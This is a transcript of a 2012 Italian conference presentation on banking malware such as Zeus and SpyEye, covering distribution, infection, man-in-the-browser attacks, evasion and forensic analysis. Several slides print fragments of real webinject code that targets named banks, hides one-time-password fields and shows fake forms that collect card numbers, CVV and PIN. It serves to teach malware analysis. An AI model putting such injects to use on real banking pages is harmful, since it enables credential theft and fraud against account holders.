Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti.

Presentazione sul tema: "Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti."— Transcript della presentazione:

1 Malware Bancario I NTRODUZIONE A L C RIMEWARE NEL S ETTORE B ANCARIO PRESI NELLA RETE - C OLLEGIO GHISLIERI 23 N OVEMBRE 2012 Dott. Francesco Schifilliti

2 C OS È UN B ANKING T ROJAN ? 001 This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking.

3 Zeus, SpyEye… e tanti altri 002

4 Soggetti (minimi) Coinvolti 003

5 Malware Developing 004

6 Malware Distribution 005 User ?

7 Malware Distribution 006 Pay-per-Install Drive-by-Download Exploit-as-a-Services

8 Ciclo Pay-per-Install 007 Exploit-as-a-Services

9 Fase di Infezione e Controllo 008 Exploit Pack Compromised Web Site Infection Mail di Spam

10 Iterando il processo dInfezione… 009 Flat BotnetP2P Botnet

11 Ciclo dInfezione di un Malware sul PC 010 Infezione sul Disco (ad es. SpyEye copia il file C:\cleansweep.ex e) Rendere Persistent il MW (ad es. con la modifica del registry) Injection (generalmente sul processo Explorer) Estensione della Injection (generalmente con tecniche di Hooking in Userland) Connessione persistente col Server di C&C

12 Odore di $$$ 011 User data theft data & session theft

13 Man in the Browser 012 Kernel- land User- land

14 Anti-Detection/Deception Techniques MW Code 013 Anti Memory Anti Emulation Anti Debugging Anti Disassembler Cryptography Packing & Protecting Obfuscation

15 Struttura di SpyEye 014 P P Binary Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Plugin del Malware: config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt Packer Obfuscation Anti-Dbg C&C

16 Un pezzettino di Webinjector di uno SpyEye 10.7 015 ….. set_url * meine.deutsche-bank.de /trxm/db/*european.transfer.enter.data* GP data_before <body data_end data_inject style="visibility:hidden data_end data_after id= data_end data_before data_end data_inject if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';} data_end data_after data_end …..

17 Un pezzettino di Webinjector di un ATS 016 ….. set_url * commbank.com.au /netbank/UserMaintenance* GP data_before *My Q* data_end data_inject window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink) document.links[i].onclick = function() { return false; }; }; var clck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) { document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden; document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error').style.top = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible; document.getElementById('error').style.display = "block; } return false; } …..

18 Webinject in Chiaro nella RAM https://bcol.barclaycard.co.uk*cardSummary*:](ÈÈÈÍÍ #inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog.ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog.ui-dialog-titlebar { visibility: hidden; display: none; } P ıº| Ó Ω |HÓ Ω |pÓ Ω |òÓıº|¿Ó Ω |ËÓ˘º|Ô˙º|8Ô˙º|`ÔπàÔπÔÿÔ–·Ô value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { ……. 017

19 SpyEye: esempio di MW modulare e parametrico 018 User Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot. billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9 bugreport.dll_a6c1992119c1550db437aac86d4ffdad ccgrabber.dll_5b1593855a6e8f01468878eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d82810241daa5e2a41327014e9a77 … su Quale Banca/Ist. Finanziario fare operazioni in Frode è definito in webinjectors.txt a Chi Trasmettere i dati collezionati dal MW è definito in collectors.txt

20 Uno Schema di Riferimento dellAnalisi 019 Forensic Ananlysis Disk Analysis MW Searching Reg. Analysis Browser Analysis File Analysis Hash Comparing Entropy Analysis MW Analysis De- Anti- XYZ DisasseblingDebugging Memory Dumping Live Analysis Network Analysis Memory Analysis PIENA COMPRENSIONE DEL FORENSIC ARTIFACT

21 GRAZIE Francesco Schifilliti fschifilliti@forensictech.it